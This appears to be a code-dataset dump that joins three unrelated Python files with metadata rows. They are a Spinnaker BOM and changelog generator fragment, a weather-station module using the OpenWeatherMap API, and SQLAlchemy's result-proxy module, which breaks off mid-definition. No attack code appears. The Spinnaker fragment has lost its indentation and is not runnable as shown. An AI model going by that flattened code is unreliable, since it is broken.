changelog = ['Spinnaker {0}\n'.format(self.__toplevel_version)]
for comp, hash in self.__changelog_start_hashes.iteritems():
version = self.__version_from_tag(comp)
# Generate the changelog for the component.
print 'Generating changelog for {comp}...'.format(comp=comp)
# Assumes the remote repository is aliased as 'origin'.
component_url = run_quick('git -C {path} config --get remote.origin.url'
.format(path=comp)).stdout.strip()
if component_url.endswith('.git'):
component_url = component_url.replace('.git', '')
result = run_quick('cd {comp}; clog -r {url} -f {hash} --setversion {version}; cd ..'
.format(comp=comp, url=component_url, hash=hash, version=version))
if result.returncode != 0:
print "Changelog generation failed for {0} with \n{1}\n exiting...".format(comp, result.stdout)
exit(result.returncode)
# Capitalize
comp_cap = comp[0].upper() + comp[1:]
changelog.append('# {0}\n{1}'.format(comp_cap, result.stdout))
print 'Writing changelog...'
# Write the changelog with the toplevel version without the build number.
# This is ok since the changelog is only published if the toplevel version is released.
changelog_file = self.__changelog_output or '{0}-changelog.md'.format(self.__toplevel_version)
with open(changelog_file, 'w') as clog:
clog.write('\n'.join(changelog))
def write_bom(self):
output_yaml = {SERVICES: {}}
for comp in self.__component_versions:
version_bump = self.__component_versions[comp]
if version_bump.major == True:
breaking_change = True
elif version_bump.minor == True:
feature = True
gradle_version = self.__version_from_tag(comp)
version_entry = {VERSION: gradle_version}
if comp == 'spinnaker-monitoring':
# Add two entries for both components of spinnaker-monitoring
output_yaml[SERVICES]['monitoring-third-party'] = dict(version_entry)
output_yaml[SERVICES]['monitoring-daemon'] = dict(version_entry)
else:
output_yaml[SERVICES][comp] = version_entry
timestamp = '{:%Y-%m-%d}'.format(datetime.datetime.now())
self.__toplevel_version = '{0}-{1}'.format(self.branch, timestamp)
toplevel_with_build = '{0}-{1}'.format(self.__toplevel_version, self.build_number)
output_yaml[VERSION] = toplevel_with_build
self.__bom_file = '{0}.yml'.format(toplevel_with_build)
self.write_bom_file(self.__bom_file, output_yaml)
if self.__alias:
output_yaml[VERSION] = self.__alias
self.write_bom_file(self.__alias + '.yml', output_yaml)
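  # Hedged sketch of the BOM dictionary written above, assuming the SERVICES and
  # VERSION constants are the strings 'services' and 'version'. Component names,
  # branch and versions are illustrative:
  #   version: master-2017-01-01-1
  #   services:
  #     clouddriver: {version: 1.2.3-4}
  #     monitoring-daemon: {version: 0.1.0-4}
  #     monitoring-third-party: {version: 0.1.0-4}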
def publish_boms(self):
"""Pushes the generated BOMs to a public GCS bucket for Halyard to use.
"""
self.publish_bom(self.__bom_file)
if self.__alias:
self.publish_bom(self.__alias + '.yml')
def write_bom_file(self, filename, output_yaml):
"""Helper function to write the calculated BOM to files.
Args:
filename [string]: Name of the file to write to.
output_yaml [dict]: Dictionary containing BOM information.
"""
with open(filename, 'w') as output_file:
output_yaml['timestamp'] = '{:%Y-%m-%d %H:%M:%S}'.format(datetime.datetime.now())
output_yaml['hostname'] = socket.gethostname()
yaml.dump(output_yaml, output_file, default_flow_style=False)
print 'Wrote BOM to {0}.'.format(filename)
def publish_bom(self, bom_path):
"""Publishes the BOM using Halyard.
Assumes that Halyard is installed and correctly configured on the current
machine.
"""
result = run_quick('hal admin publish bom --color false --bom-path {0}'
.format(bom_path))
if result.returncode != 0:
print "'hal admin publish bom' command failed with: \n{0}\n exiting...".format(result.stdout)
exit(result.returncode)
def __publish_config(self, component, profile_path):
"""Publishes the yaml configuration consumed by Halyard for the component.
Args:
component [string]: Name of the Spinnaker component.
profile_path [string]: Path to component's yaml configuration file.
"""
for profile in os.listdir(profile_path):
full_profile = os.path.join(profile_path, profile)
if os.path.isfile(full_profile):
result = run_quick(
'hal admin publish profile {0} --color false --bom-path {1} --profile-path {2}'
.format(component, self.__bom_file, full_profile)
)
if result.returncode != 0:
print "'hal admin publish profile' command failed with: \n{0}\n exiting...".format(result.stdout)
exit(result.returncode)
def publish_microservice_configs(self):
for comp in self.COMPONENTS:
if comp == 'spinnaker-monitoring':
daemon_path = '{0}-daemon'.format(comp)
config_path = os.path.join(comp, daemon_path, 'halconfig')
self.__publish_config('monitoring-daemon', config_path)
elif comp == 'spinnaker':
pass
else:
config_path = os.path.join(comp, 'halconfig')
self.__publish_config(comp, config_path)
def determine_and_tag_versions(self):
for comp in self.COMPONENTS:
self.path = os.path.join(self.__base_dir, comp)
self.checkout_branch()
self.parse_git_tree()
self.__changelog_start_hashes[comp] = self.current_version.hash
version_bump = self.tag_head()
self.__component_versions[comp] = version_bump
self.delete_unwanted_tags()
@classmethod
def main(cls):
parser = argparse.ArgumentParser()
cls.init_argument_parser(parser)
options = parser.parse_args()
if options.container_builder not in ['gcb', 'docker']:
raise ValueError(
'Invalid container_builder="{0}"'.format(options.container_builder))
bom_generator = cls(options)
bom_generator.determine_and_tag_versions()
if options.container_builder == 'gcb':
bom_generator.write_container_builder_gcr_config()
elif options.container_builder == 'docker':
bom_generator.write_docker_version_files()
else:
raise NotImplementedError('container_builder="{0}"'.format(
options.container_builder))
bom_generator.write_bom()
bom_generator.publish_boms()
bom_generator.publish_microservice_configs()
bom_generator.generate_changelog()
if __name__ == '__main__':
sys.exit(BomGenerator.main())
|
apache-2.0
| 735,947,141,761,425,800
| 37.878788
| 117
| 0.628059
| false
| 3.833284
| true
| false
| false
|
bakostamas/weather-station
|
weather.py
|
1
|
9237
|
import json, pprint, app_settings, pytz
import connected_sensor
from datetime import datetime
from urllib.request import urlopen # Only in Python 3
weather_list = {}
def get_weather_data(p_city_id, p_type, p_cnt):
"""
Get weather data from openweathermap.org
:param p_city_id: ID of the city
:param p_type: 'DF'=Daily forecast for 7 days, 'F'=3 hours forecast for 5 days, 'NOW'=Weather Now
:param p_cnt: Forecasted days limit, 0=No_limit
:return: weather_data{} (dictionary)
"""
if p_type == 'DF':
url_domain = 'http://api.openweathermap.org/data/2.5/forecast/daily'
elif p_type == 'F':
url_domain = 'http://api.openweathermap.org/data/2.5/forecast'
elif p_type == 'NOW':
url_domain = 'http://api.openweathermap.org/data/2.5/weather'
access_link = url_domain+'?id='+str(p_city_id)+'&appid='+app_settings.appid+'&units='+app_settings.units+\
'&lang='+app_settings.lang+'&mode='+app_settings.mode
if p_cnt > 0:
access_link += '&cnt='+str(p_cnt)
try:
response = urlopen(access_link)
json_data = response.read().decode('utf-8')
weather_data = json.loads(json_data)
except: # If the weather server is unavailable return an empty dictionary
weather_data = {}
return weather_data
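# Hedged usage sketch (not part of the original module). The city id matches the
# one used in the test comment at the bottom of this file; a real call also needs
# a valid app_settings.appid:
#   current = get_weather_data(3054643, 'NOW', 0)
#   if current:
#       print(current['main']['temp'])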
class WeatherNow:
"""Weather details for current weather"""
def __init__(self):
if len(weather_list) != 0:
self.query_date = datetime.now(pytz.timezone(app_settings.timezone))
self.city_name = weather_list['name']
self.country_code = weather_list['sys']['country']
timestamp = weather_list['dt']
date_object = datetime.fromtimestamp(timestamp, tz=pytz.timezone(app_settings.timezone))
self.date = date_object.strftime(app_settings.full_date_format)
self.day_of_week = date_object.strftime("%A").capitalize()
self.clouds = weather_list['clouds']['all']
try:
self.wind_dir = weather_list['wind']['deg']
except:
self.wind_dir = '0'
            # int() ensures the rounded value is displayed without a trailing .0
self.wind_speed = int(round(weather_list['wind']['speed'] * 3.6, 0)) # converted to Km/h
self.humidity = int(round(weather_list['main']['humidity'], 0))
self.pressure = int(round(weather_list['main']['pressure'], 0))
self.temp_now = round(weather_list['main']['temp'], 1) # rounded to 1 decimal
self.weather_id = weather_list['weather'][0]['id']
self.weather_sum = weather_list['weather'][0]['main']
self.weather_desc = weather_list['weather'][0]['description'].title() # First letters to uppercase
try:
                self.rain_volume = weather_list['rain']['3h']  # Rain volume in the last 3 hours
except:
self.rain_volume = 0
try:
self.snow_volume = weather_list['snow']['3h'] # Snow volume in the last 3 hours
except:
self.snow_volume = 0
timestamp_sunrise = weather_list['sys']['sunrise']
date_object_sunrise = datetime.fromtimestamp(timestamp_sunrise, tz=pytz.timezone(app_settings.timezone))
self.sunrise = date_object_sunrise.strftime(app_settings.time_format)
timestamp_sunset = weather_list['sys']['sunset']
date_object_sunset = datetime.fromtimestamp(timestamp_sunset, tz=pytz.timezone(app_settings.timezone))
self.sunset = date_object_sunset.strftime(app_settings.time_format)
            # Define the weather icon and css template based on whether it is day or night now:
if date_object_sunrise < self.query_date and self.query_date < date_object_sunset:
self.weather_icon = 'wi-owm-day-' + str(self.weather_id)
self.color_theme = app_settings.color_theme_day
else:
self.weather_icon = 'wi-owm-night-' + str(self.weather_id)
self.color_theme = app_settings.color_theme_night
# Get sensor's data
self.sensor_data = connected_sensor.SensorData()
self.sensor_data.pressure_r = round(self.sensor_data.pressure)
class WeatherForecast:
"""Weather details for forecast"""
def __init__(self):
        # Init the arrays with 0 values at index zero
self.date = ["0"]
self.date2 = ["0"]
self.day_of_week = ["0"]
self.clouds = ["0"]
self.wind_dir = ["0"]
self.wind_speed = ["0"]
self.humidity = ["0"]
self.pressure = ["0"]
self.temp_day = ["0"]
self.temp_min = ["0"]
self.temp_max = ["0"]
self.temp_diff = ["0"]
self.temp_diff_trend = ["0"]
self.temp_night = ["0"]
self.temp_eve = ["0"]
self.temp_morn = ["0"]
self.weather_id = ["0"]
self.weather_sum = ["0"]
self.weather_desc = ["0"]
if len(weather_list) != 0:
self.city_name = weather_list['city']['name']
self.country_code = weather_list['city']['country']
self.query_date = datetime.now(pytz.timezone(app_settings.timezone))
for list_index in range(1, 6): # weather_list['list']
timestamp = weather_list['list'][list_index]['dt']
date_object = datetime.fromtimestamp(timestamp, tz=pytz.timezone(app_settings.timezone))
self.date.append(date_object.strftime(app_settings.short_date_format)) # The same date in different format
self.date2.append(date_object.strftime("%Y-%m-%d")) # The same date in different format
self.day_of_week.append(date_object.strftime("%A").capitalize())
self.clouds.append(weather_list['list'][list_index]['clouds'])
self.wind_dir.append(weather_list['list'][list_index]['deg'])
self.wind_speed.append(int(round(weather_list['list'][list_index]['speed'] * 3.6, 0))) # converted to Km/h
self.humidity.append(int(round(weather_list['list'][list_index]['humidity'], 0)))
self.pressure.append(int(round(weather_list['list'][list_index]['pressure'],0)))
self.temp_day.append(int(round(weather_list['list'][list_index]['temp']['day'], 0)))
self.temp_min.append(int(round(weather_list['list'][list_index]['temp']['min'], 0)))
self.temp_max.append(int(round(weather_list['list'][list_index]['temp']['max'], 0)))
# "temp_diff" is the temperature difference between the given day's max and the previous day's max.
difference = calculate_temp_dif(self.temp_max[list_index], self.temp_max[list_index-1])
self.temp_diff.append(difference['temp_diff'])
self.temp_diff_trend.append(difference['temp_diff_trend'])
self.temp_night.append(int(round(weather_list['list'][list_index]['temp']['night'], 0)))
self.temp_eve.append(int(round(weather_list['list'][list_index]['temp']['eve'], 0)))
self.temp_morn.append(int(round(weather_list['list'][list_index]['temp']['morn'], 0)))
self.weather_id.append(weather_list['list'][list_index]['weather'][0]['id'])
self.weather_sum.append(weather_list['list'][list_index]['weather'][0]['main'])
self.weather_desc.append(weather_list['list'][list_index]['weather'][0]['description'].title()) # First letters to uppercase
def fetch_weather_now(p_city_code):
"""
Fetch the current weather
:param p_city_code: ID of the city
"""
global weather_list
weather_list.clear()
access_type = 'NOW' # Current weather
weather_list = get_weather_data(p_city_code, access_type, 0)
weather = WeatherNow()
return weather
def fetch_weather_forecast(p_city_code):
"""
Fetch the forecasted weather
:param p_city_code: ID of the city
"""
global weather_list
weather_list.clear()
access_type = 'DF' # Daily forecast
weather_list = get_weather_data(p_city_code, access_type, 0)
    weather = WeatherForecast()
return weather
def calculate_temp_dif(temp_today, temp_last_day):
"""
    Calculate the difference between two temperatures and determine the appropriate icon code
:param temp_today: Today's max temperature forecast
:param temp_last_day: Yesterday's max temperature
"""
diff = int(temp_today) - int(temp_last_day)
if diff > 0:
temp_diff = '+' + str(diff)
temp_diff_trend = ['wi-direction-up', 'red']
elif diff < 0:
temp_diff = str(diff)
temp_diff_trend = ['wi-direction-down', 'blue']
else:
temp_diff = str(diff)
temp_diff_trend = ['wi-direction-right', 'green']
return {'temp_diff': temp_diff, 'temp_diff_trend': temp_diff_trend}
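# Example (not part of the original module): calculate_temp_dif(12, 9) returns
# {'temp_diff': '+3', 'temp_diff_trend': ['wi-direction-up', 'red']}.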
# ONLY FOR TESTING PURPOSE:
# weather_list = get_weather_data(3054643, 'DF', 0)
# pprint.pprint(weather_list)
# for list_index in weather_list['list']:
# print(list_index)
#
# print('----')
# print(weather_list['list'][6])
|
gpl-3.0
| 1,599,481,039,528,907,800
| 42.570755
| 141
| 0.598354
| false
| 3.596963
| false
| false
| false
|
michaelBenin/sqlalchemy
|
lib/sqlalchemy/engine/result.py
|
1
|
36000
|
# engine/result.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Define result set constructs including :class:`.ResultProxy`
and :class:`.RowProxy`."""
from .. import exc, util
from ..sql import expression, sqltypes
import collections
import operator
# This reconstructor is necessary so that pickles with the C extension or
# without use the same Binary format.
try:
# We need a different reconstructor on the C extension so that we can
# add extra checks that fields have correctly been initialized by
# __setstate__.
from sqlalchemy.cresultproxy import safe_rowproxy_reconstructor
# The extra function embedding is needed so that the
# reconstructor function has the same signature whether or not
# the extension is present.
def rowproxy_reconstructor(cls, state):
return safe_rowproxy_reconstructor(cls, state)
except ImportError:
def rowproxy_reconstructor(cls, state):
obj = cls.__new__(cls)
obj.__setstate__(state)
return obj
try:
from sqlalchemy.cresultproxy import BaseRowProxy
except ImportError:
class BaseRowProxy(object):
__slots__ = ('_parent', '_row', '_processors', '_keymap')
def __init__(self, parent, row, processors, keymap):
"""RowProxy objects are constructed by ResultProxy objects."""
self._parent = parent
self._row = row
self._processors = processors
self._keymap = keymap
def __reduce__(self):
return (rowproxy_reconstructor,
(self.__class__, self.__getstate__()))
def values(self):
"""Return the values represented by this RowProxy as a list."""
return list(self)
def __iter__(self):
for processor, value in zip(self._processors, self._row):
if processor is None:
yield value
else:
yield processor(value)
def __len__(self):
return len(self._row)
def __getitem__(self, key):
try:
processor, obj, index = self._keymap[key]
except KeyError:
processor, obj, index = self._parent._key_fallback(key)
except TypeError:
if isinstance(key, slice):
l = []
for processor, value in zip(self._processors[key],
self._row[key]):
if processor is None:
l.append(value)
else:
l.append(processor(value))
return tuple(l)
else:
raise
if index is None:
raise exc.InvalidRequestError(
"Ambiguous column name '%s' in result set! "
"try 'use_labels' option on select statement." % key)
if processor is not None:
return processor(self._row[index])
else:
return self._row[index]
def __getattr__(self, name):
try:
return self[name]
except KeyError as e:
raise AttributeError(e.args[0])
class RowProxy(BaseRowProxy):
"""Proxy values from a single cursor row.
Mostly follows "ordered dictionary" behavior, mapping result
values to the string-based column name, the integer position of
the result in the row, as well as Column instances which can be
mapped to the original Columns that produced this result set (for
results that correspond to constructed SQL expressions).
"""
__slots__ = ()
def __contains__(self, key):
return self._parent._has_key(self._row, key)
def __getstate__(self):
return {
'_parent': self._parent,
'_row': tuple(self)
}
def __setstate__(self, state):
self._parent = parent = state['_parent']
self._row = state['_row']
self._processors = parent._processors
self._keymap = parent._keymap
__hash__ = None
def _op(self, other, op):
return op(tuple(self), tuple(other)) \
if isinstance(other, RowProxy) \
else op(tuple(self), other)
def __lt__(self, other):
return self._op(other, operator.lt)
def __le__(self, other):
return self._op(other, operator.le)
def __ge__(self, other):
return self._op(other, operator.ge)
def __gt__(self, other):
return self._op(other, operator.gt)
def __eq__(self, other):
return self._op(other, operator.eq)
def __ne__(self, other):
return self._op(other, operator.ne)
def __repr__(self):
return repr(tuple(self))
def has_key(self, key):
"""Return True if this RowProxy contains the given key."""
return self._parent._has_key(self._row, key)
def items(self):
"""Return a list of tuples, each tuple containing a key/value pair."""
# TODO: no coverage here
return [(key, self[key]) for key in self.keys()]
def keys(self):
"""Return the list of keys as strings represented by this RowProxy."""
return self._parent.keys
def iterkeys(self):
return iter(self._parent.keys)
def itervalues(self):
return iter(self)
try:
# Register RowProxy with Sequence,
# so sequence protocol is implemented
from collections import Sequence
Sequence.register(RowProxy)
except ImportError:
pass
class ResultMetaData(object):
"""Handle cursor.description, applying additional info from an execution
context."""
def __init__(self, parent, metadata):
self._processors = processors = []
# We do not strictly need to store the processor in the key mapping,
# though it is faster in the Python version (probably because of the
# saved attribute lookup self._processors)
self._keymap = keymap = {}
self.keys = []
context = parent.context
dialect = context.dialect
typemap = dialect.dbapi_type_map
translate_colname = context._translate_colname
self.case_sensitive = dialect.case_sensitive
# high precedence key values.
primary_keymap = {}
for i, rec in enumerate(metadata):
colname = rec[0]
coltype = rec[1]
if dialect.description_encoding:
colname = dialect._description_decoder(colname)
if translate_colname:
colname, untranslated = translate_colname(colname)
if dialect.requires_name_normalize:
colname = dialect.normalize_name(colname)
if context.result_map:
try:
name, obj, type_ = context.result_map[colname
if self.case_sensitive
else colname.lower()]
except KeyError:
name, obj, type_ = \
colname, None, typemap.get(coltype, sqltypes.NULLTYPE)
else:
name, obj, type_ = \
colname, None, typemap.get(coltype, sqltypes.NULLTYPE)
processor = context.get_result_processor(type_, colname, coltype)
processors.append(processor)
rec = (processor, obj, i)
# indexes as keys. This is only needed for the Python version of
# RowProxy (the C version uses a faster path for integer indexes).
primary_keymap[i] = rec
# populate primary keymap, looking for conflicts.
if primary_keymap.setdefault(
name if self.case_sensitive
else name.lower(),
rec) is not rec:
# place a record that doesn't have the "index" - this
# is interpreted later as an AmbiguousColumnError,
# but only when actually accessed. Columns
# colliding by name is not a problem if those names
# aren't used; integer access is always
# unambiguous.
primary_keymap[name
if self.case_sensitive
else name.lower()] = rec = (None, obj, None)
self.keys.append(colname)
if obj:
for o in obj:
keymap[o] = rec
# technically we should be doing this but we
# are saving on callcounts by not doing so.
# if keymap.setdefault(o, rec) is not rec:
# keymap[o] = (None, obj, None)
if translate_colname and \
untranslated:
keymap[untranslated] = rec
# overwrite keymap values with those of the
# high precedence keymap.
keymap.update(primary_keymap)
@util.pending_deprecation("0.8", "sqlite dialect uses "
"_translate_colname() now")
def _set_keymap_synonym(self, name, origname):
"""Set a synonym for the given name.
Some dialects (SQLite at the moment) may use this to
adjust the column names that are significant within a
row.
"""
rec = (processor, obj, i) = self._keymap[origname if
self.case_sensitive
else origname.lower()]
if self._keymap.setdefault(name, rec) is not rec:
self._keymap[name] = (processor, obj, None)
def _key_fallback(self, key, raiseerr=True):
map = self._keymap
result = None
if isinstance(key, util.string_types):
result = map.get(key if self.case_sensitive else key.lower())
# fallback for targeting a ColumnElement to a textual expression
# this is a rare use case which only occurs when matching text()
        # or column('name') constructs to ColumnElements, or after a
# pickle/unpickle roundtrip
elif isinstance(key, expression.ColumnElement):
if key._label and (
key._label
if self.case_sensitive
else key._label.lower()) in map:
result = map[key._label
if self.case_sensitive
else key._label.lower()]
elif hasattr(key, 'name') and (
key.name
if self.case_sensitive
else key.name.lower()) in map:
# match is only on name.
result = map[key.name
if self.case_sensitive
else key.name.lower()]
# search extra hard to make sure this
# isn't a column/label name overlap.
# this check isn't currently available if the row
# was unpickled.
if result is not None and \
result[1] is not None:
for obj in result[1]:
if key._compare_name_for_result(obj):
break
else:
result = None
if result is None:
if raiseerr:
raise exc.NoSuchColumnError(
"Could not locate column in row for column '%s'" %
expression._string_or_unprintable(key))
else:
return None
else:
map[key] = result
return result
def _has_key(self, row, key):
if key in self._keymap:
return True
else:
return self._key_fallback(key, False) is not None
def __getstate__(self):
return {
'_pickled_keymap': dict(
(key, index)
for key, (processor, obj, index) in self._keymap.items()
if isinstance(key, util.string_types + util.int_types)
),
'keys': self.keys,
"case_sensitive": self.case_sensitive,
}
def __setstate__(self, state):
# the row has been processed at pickling time so we don't need any
# processor anymore
self._processors = [None for _ in range(len(state['keys']))]
self._keymap = keymap = {}
for key, index in state['_pickled_keymap'].items():
# not preserving "obj" here, unfortunately our
# proxy comparison fails with the unpickle
keymap[key] = (None, None, index)
self.keys = state['keys']
self.case_sensitive = state['case_sensitive']
self._echo = False
class ResultProxy(object):
"""Wraps a DB-API cursor object to provide easier access to row columns.
Individual columns may be accessed by their integer position,
case-insensitive column name, or by ``schema.Column``
object. e.g.::
row = fetchone()
col1 = row[0] # access via integer position
col2 = row['col2'] # access via name
col3 = row[mytable.c.mycol] # access via Column object.
``ResultProxy`` also handles post-processing of result column
data using ``TypeEngine`` objects, which are referenced from
the originating SQL statement that produced this result set.
"""
_process_row = RowProxy
out_parameters = None
_can_close_connection = False
_metadata = None
def __init__(self, context):
self.context = context
self.dialect = context.dialect
self.closed = False
self.cursor = self._saved_cursor = context.cursor
self.connection = context.root_connection
self._echo = self.connection._echo and \
context.engine._should_log_debug()
self._init_metadata()
def _init_metadata(self):
metadata = self._cursor_description()
if metadata is not None:
if self.context.compiled and \
'compiled_cache' in self.context.execution_options:
if self.context.compiled._cached_metadata:
self._metadata = self.context.compiled._cached_metadata
else:
self._metadata = self.context.compiled._cached_metadata = \
ResultMetaData(self, metadata)
else:
self._metadata = ResultMetaData(self, metadata)
if self._echo:
self.context.engine.logger.debug(
"Col %r", tuple(x[0] for x in metadata))
def keys(self):
"""Return the current set of string keys for rows."""
if self._metadata:
return self._metadata.keys
else:
return []
@util.memoized_property
def rowcount(self):
"""Return the 'rowcount' for this result.
The 'rowcount' reports the number of rows *matched*
by the WHERE criterion of an UPDATE or DELETE statement.
.. note::
Notes regarding :attr:`.ResultProxy.rowcount`:
* This attribute returns the number of rows *matched*,
which is not necessarily the same as the number of rows
that were actually *modified* - an UPDATE statement, for example,
may have no net change on a given row if the SET values
given are the same as those present in the row already.
Such a row would be matched but not modified.
On backends that feature both styles, such as MySQL,
rowcount is configured by default to return the match
count in all cases.
* :attr:`.ResultProxy.rowcount` is *only* useful in conjunction
with an UPDATE or DELETE statement. Contrary to what the Python
DBAPI says, it does *not* return the
number of rows available from the results of a SELECT statement
as DBAPIs cannot support this functionality when rows are
unbuffered.
* :attr:`.ResultProxy.rowcount` may not be fully implemented by
all dialects. In particular, most DBAPIs do not support an
aggregate rowcount result from an executemany call.
The :meth:`.ResultProxy.supports_sane_rowcount` and
:meth:`.ResultProxy.supports_sane_multi_rowcount` methods
will report from the dialect if each usage is known to be
supported.
* Statements that use RETURNING may not return a correct
rowcount.
"""
try:
return self.context.rowcount
except Exception as e:
self.connection._handle_dbapi_exception(
e, None, None, self.cursor, self.context)
@property
def lastrowid(self):
"""return the 'lastrowid' accessor on the DBAPI cursor.
This is a DBAPI specific method and is only functional
for those backends which support it, for statements
        where it is appropriate. Its behavior is not
consistent across backends.
Usage of this method is normally unnecessary when
using insert() expression constructs; the
:attr:`~ResultProxy.inserted_primary_key` attribute provides a
tuple of primary key values for a newly inserted row,
regardless of database backend.
"""
try:
return self._saved_cursor.lastrowid
except Exception as e:
self.connection._handle_dbapi_exception(
e, None, None,
self._saved_cursor, self.context)
@property
def returns_rows(self):
"""True if this :class:`.ResultProxy` returns rows.
I.e. if it is legal to call the methods
:meth:`~.ResultProxy.fetchone`,
:meth:`~.ResultProxy.fetchmany`
:meth:`~.ResultProxy.fetchall`.
"""
return self._metadata is not None
@property
def is_insert(self):
"""True if this :class:`.ResultProxy` is the result
        of executing an expression language compiled
:func:`.expression.insert` construct.
When True, this implies that the
:attr:`inserted_primary_key` attribute is accessible,
assuming the statement did not include
a user defined "returning" construct.
"""
return self.context.isinsert
def _cursor_description(self):
"""May be overridden by subclasses."""
return self._saved_cursor.description
def close(self, _autoclose_connection=True):
"""Close this ResultProxy.
Closes the underlying DBAPI cursor corresponding to the execution.
Note that any data cached within this ResultProxy is still available.
For some types of results, this may include buffered rows.
If this ResultProxy was generated from an implicit execution,
the underlying Connection will also be closed (returns the
underlying DBAPI connection to the connection pool.)
This method is called automatically when:
* all result rows are exhausted using the fetchXXX() methods.
* cursor.description is None.
"""
if not self.closed:
self.closed = True
self.connection._safe_close_cursor(self.cursor)
if _autoclose_connection and \
self.connection.should_close_with_result:
self.connection.close()
# allow consistent errors
self.cursor = None
def __iter__(self):
while True:
row = self.fetchone()
if row is None:
raise StopIteration
else:
yield row
@util.memoized_property
def inserted_primary_key(self):
"""Return the primary key for the row just inserted.
The return value is a list of scalar values
corresponding to the list of primary key columns
in the target table.
This only applies to single row :func:`.insert`
constructs which did not explicitly specify
:meth:`.Insert.returning`.
Note that primary key columns which specify a
server_default clause,
or otherwise do not qualify as "autoincrement"
columns (see the notes at :class:`.Column`), and were
generated using the database-side default, will
appear in this list as ``None`` unless the backend
supports "returning" and the insert statement executed
with the "implicit returning" enabled.
Raises :class:`~sqlalchemy.exc.InvalidRequestError` if the executed
statement is not a compiled expression construct
or is not an insert() construct.
"""
if not self.context.compiled:
raise exc.InvalidRequestError(
"Statement is not a compiled "
"expression construct.")
elif not self.context.isinsert:
raise exc.InvalidRequestError(
"Statement is not an insert() "
"expression construct.")
elif self.context._is_explicit_returning:
raise exc.InvalidRequestError(
"Can't call inserted_primary_key "
"when returning() "
"is used.")
return self.context.inserted_primary_key
def last_updated_params(self):
"""Return the collection of updated parameters from this
execution.
Raises :class:`~sqlalchemy.exc.InvalidRequestError` if the executed
statement is not a compiled expression construct
or is not an update() construct.
"""
if not self.context.compiled:
raise exc.InvalidRequestError(
"Statement is not a compiled "
"expression construct.")
elif not self.context.isupdate:
raise exc.InvalidRequestError(
"Statement is not an update() "
"expression construct.")
elif self.context.executemany:
return self.context.compiled_parameters
else:
return self.context.compiled_parameters[0]
def last_inserted_params(self):
"""Return the collection of inserted parameters from this
execution.
Raises :class:`~sqlalchemy.exc.InvalidRequestError` if the executed
statement is not a compiled expression construct
or is not an insert() construct.
"""
if not self.context.compiled:
raise exc.InvalidRequestError(
"Statement is not a compiled "
"expression construct.")
elif not self.context.isinsert:
raise exc.InvalidRequestError(
"Statement is not an insert() "
"expression construct.")
elif self.context.executemany:
return self.context.compiled_parameters
else:
return self.context.compiled_parameters[0]
@property
def returned_defaults(self):
"""Return the values of default columns that were fetched using
the :meth:`.ValuesBase.return_defaults` feature.
The value is an instance of :class:`.RowProxy`, or ``None``
if :meth:`.ValuesBase.return_defaults` was not used or if the
backend does not support RETURNING.
.. versionadded:: 0.9.0
.. seealso::
:meth:`.ValuesBase.return_defaults`
"""
return self.context.returned_defaults
def lastrow_has_defaults(self):
"""Return ``lastrow_has_defaults()`` from the underlying
:class:`.ExecutionContext`.
See :class:`.ExecutionContext` for details.
"""
return self.context.lastrow_has_defaults()
def postfetch_cols(self):
"""Return ``postfetch_cols()`` from the underlying
:class:`.ExecutionContext`.
See :class:`.ExecutionContext` for details.
Raises :class:`~sqlalchemy.exc.InvalidRequestError` if the executed
statement is not a compiled expression construct
or is not an insert() or update() construct.
"""
if not self.context.compiled:
raise exc.InvalidRequestError(
"Statement is not a compiled "
"expression construct.")
elif not self.context.isinsert and not self.context.isupdate:
raise exc.InvalidRequestError(
"Statement is not an insert() or update() "
"expression construct.")
return self.context.postfetch_cols
def prefetch_cols(self):
"""Return ``prefetch_cols()`` from the underlying
:class:`.ExecutionContext`.
See :class:`.ExecutionContext` for details.
Raises :class:`~sqlalchemy.exc.InvalidRequestError` if the executed
statement is not a compiled expression construct
or is not an insert() or update() construct.
"""
if not self.context.compiled:
raise exc.InvalidRequestError(
"Statement is not a compiled "
"expression construct.")
elif not self.context.isinsert and not self.context.isupdate:
raise exc.InvalidRequestError(
"Statement is not an insert() or update() "
"expression construct.")
return self.context.prefetch_cols
def supports_sane_rowcount(self):
"""Return ``supports_sane_rowcount`` from the dialect.
See :attr:`.ResultProxy.rowcount` for background.
"""
return self.dialect.supports_sane_rowcount
def supports_sane_multi_rowcount(self):
"""Return ``supports_sane_multi_rowcount`` from the dialect.
See :attr:`.ResultProxy.rowcount` for background.
"""
return self.dialect.supports_sane_multi_rowcount
def _fetchone_impl(self):
try:
return self.cursor.fetchone()
except AttributeError:
self._non_result()
def _fetchmany_impl(self, size=None):
try:
if size is None:
return self.cursor.fetchmany()
else:
return self.cursor.fetchmany(size)
except AttributeError:
self._non_result()
def _fetchall_impl(self):
try:
return self.cursor.fetchall()
except AttributeError:
self._non_result()
def _non_result(self):
if self._metadata is None:
raise exc.ResourceClosedError(
"This result object does not return rows. "
"It has been closed automatically.",
)
else:
raise exc.ResourceClosedError("This result object is closed.")
def process_rows(self, rows):
process_row = self._process_row
metadata = self._metadata
keymap = metadata._keymap
processors = metadata._processors
if self._echo:
log = self.context.engine.logger.debug
l = []
for row in rows:
log("Row %r", row)
l.append(process_row(metadata, row, processors, keymap))
return l
else:
return [process_row(metadata, row, processors, keymap)
for row in rows]
def fetchall(self):
"""Fetch all rows, just like DB-API ``cursor.fetchall()``."""
try:
l = self.process_rows(self._fetchall_impl())
self.close()
return l
except Exception as e:
self.connection._handle_dbapi_exception(
e, None, None,
self.cursor, self.context)
def fetchmany(self, size=None):
"""Fetch many rows, just like DB-API
``cursor.fetchmany(size=cursor.arraysize)``.
If rows are present, the cursor remains open after this is called.
Else the cursor is automatically closed and an empty list is returned.
"""
try:
l = self.process_rows(self._fetchmany_impl(size))
if len(l) == 0:
self.close()
return l
except Exception as e:
self.connection._handle_dbapi_exception(
e, None, None,
self.cursor, self.context)
def fetchone(self):
"""Fetch one row, just like DB-API ``cursor.fetchone()``.
If a row is present, the cursor remains open after this is called.
Else the cursor is automatically closed and None is returned.
"""
try:
row = self._fetchone_impl()
if row is not None:
return self.process_rows([row])[0]
else:
self.close()
return None
except Exception as e:
self.connection._handle_dbapi_exception(
e, None, None,
self.cursor, self.context)
def first(self):
"""Fetch the first row and then close the result set unconditionally.
Returns None if no row is present.
"""
if self._metadata is None:
self._non_result()
try:
row = self._fetchone_impl()
except Exception as e:
self.connection._handle_dbapi_exception(
e, None, None,
self.cursor, self.context)
try:
if row is not None:
return self.process_rows([row])[0]
else:
return None
finally:
self.close()
def scalar(self):
